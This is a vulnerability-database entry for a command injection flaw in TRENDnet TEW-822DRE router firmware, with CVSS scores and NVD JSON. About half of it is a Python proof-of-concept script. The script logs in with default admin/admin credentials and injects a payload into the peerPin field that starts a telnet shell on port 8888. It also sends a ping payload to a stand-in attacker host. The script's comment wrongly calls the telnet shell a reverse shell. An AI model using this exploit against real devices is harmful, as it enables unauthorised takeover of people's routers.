Security Vulnerability Report
CVE-2025-15139 CVSS 6.3 MEDIUM

CVE-2025-15139

Published: 2025-12-28 14:16:28
Last Modified: 2026-04-29 01:00:02

Description

A vulnerability has been found in TRENDnet TEW-822DRE 1.00B21/1.01B06. This affects the function sub_43ACF4 of the file /boafrm/formWsc. Such manipulation of the argument peerPin leads to command injection. The attack can be executed remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:o:trendnet:tew-822dre_firmware:1.00b21:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:trendnet:tew-822dre_firmware:1.01b06:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:trendnet:tew-822dre:-:*:*:*:*:*:*:* - NOT VULNERABLE
TRENDnet TEW-822DRE firmware 1.00B21
TRENDnet TEW-822DRE firmware 1.01B06

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# CVE-2025-15139 PoC - TRENDnet TEW-822DRE Command Injection
# Target: TRENDnet TEW-822DRE firmware 1.00B21/1.01B06

target_ip = "192.168.10.1"  # Default router IP
target_url = f"http://{target_ip}/boafrm/formWsc"

# Malicious payload - injects command to create a reverse shell
# The peerPin parameter is vulnerable to command injection
malicious_pin = ";telnetd -p 8888 -l /bin/sh #"

# Authentication credentials (default or compromised)
# Module-level so both functions below can use them
auth = ('admin', 'admin')  # Default credentials often unchanged


def exploit_command_injection():
    """
    Exploit the command injection vulnerability in TRENDnet TEW-822DRE
    via the peerPin parameter in /boafrm/formWsc
    """
    # Construct the malicious request
    data = {
        'peerPin': malicious_pin,
        'submit': 'WPS',
        'wps_mode': '1'
    }
    try:
        response = requests.post(target_url, data=data, auth=auth, timeout=10)
        print(f"[*] Request sent to {target_url}")
        print(f"[*] Payload: {malicious_pin}")
        print(f"[*] Status Code: {response.status_code}")
        if response.status_code == 200:
            print("[+] Exploit request completed")
            print("[+] Check if telnet server is running on port 8888")
        else:
            print("[-] Unexpected response")
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")


def verify_vulnerability():
    """
    Verify if the target is vulnerable by checking for command injection
    """
    # Test with simple ping command to verify injection
    verify_payload = ";ping -c 3 attacker.example.com #"
    data = {
        'peerPin': verify_payload,
        'submit': 'WPS',
        'wps_mode': '1'
    }
    try:
        response = requests.post(target_url, data=data, auth=auth, timeout=10)
        print("[*] Verification payload sent")
    except Exception as e:
        print(f"[-] Error during verification: {e}")


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-15139 - TRENDnet TEW-822DRE Command Injection")
    print("=" * 60)
    verify_vulnerability()
    exploit_command_injection()
```

References

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-15139", "sourceIdentifier": "[email protected]", "published": "2025-12-28T14:16:27.603", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in TRENDnet TEW-822DRE 1.00B21/1.01B06. This affects the function sub_43ACF4  of the file /boafrm/formWsc. Such manipulation of the argument peerPin leads to command injection. The attack can be executed remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", 
"Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-77"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"operator": 
"AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:trendnet:tew-822dre_firmware:1.00b21:*:*:*:*:*:*:*", "matchCriteriaId": "6C6E71C2-9372-445D-AB85-AE8A3354A13F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:trendnet:tew-822dre_firmware:1.01b06:*:*:*:*:*:*:*", "matchCriteriaId": "2C85CFF6-AA4B-4BC9-BA11-0CF0FF4F0941"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:trendnet:tew-822dre:-:*:*:*:*:*:*:*", "matchCriteriaId": "C96E1973-C97A-4B75-824D-6EAE4CFA3694"}]}]}], "references": [{"url": "https://pentagonal-time-3a7.notion.site/TRENDnet-TEW-822DRE-Command-Injection-2c9e5dd4c5a580f190e9c411ad627e9a#2c9e5dd4c5a5801dae7ad20828639d4b", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.338517", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.338517", "source": "[email protected]", "tags": ["Third Party Advisory" ... (truncated)
```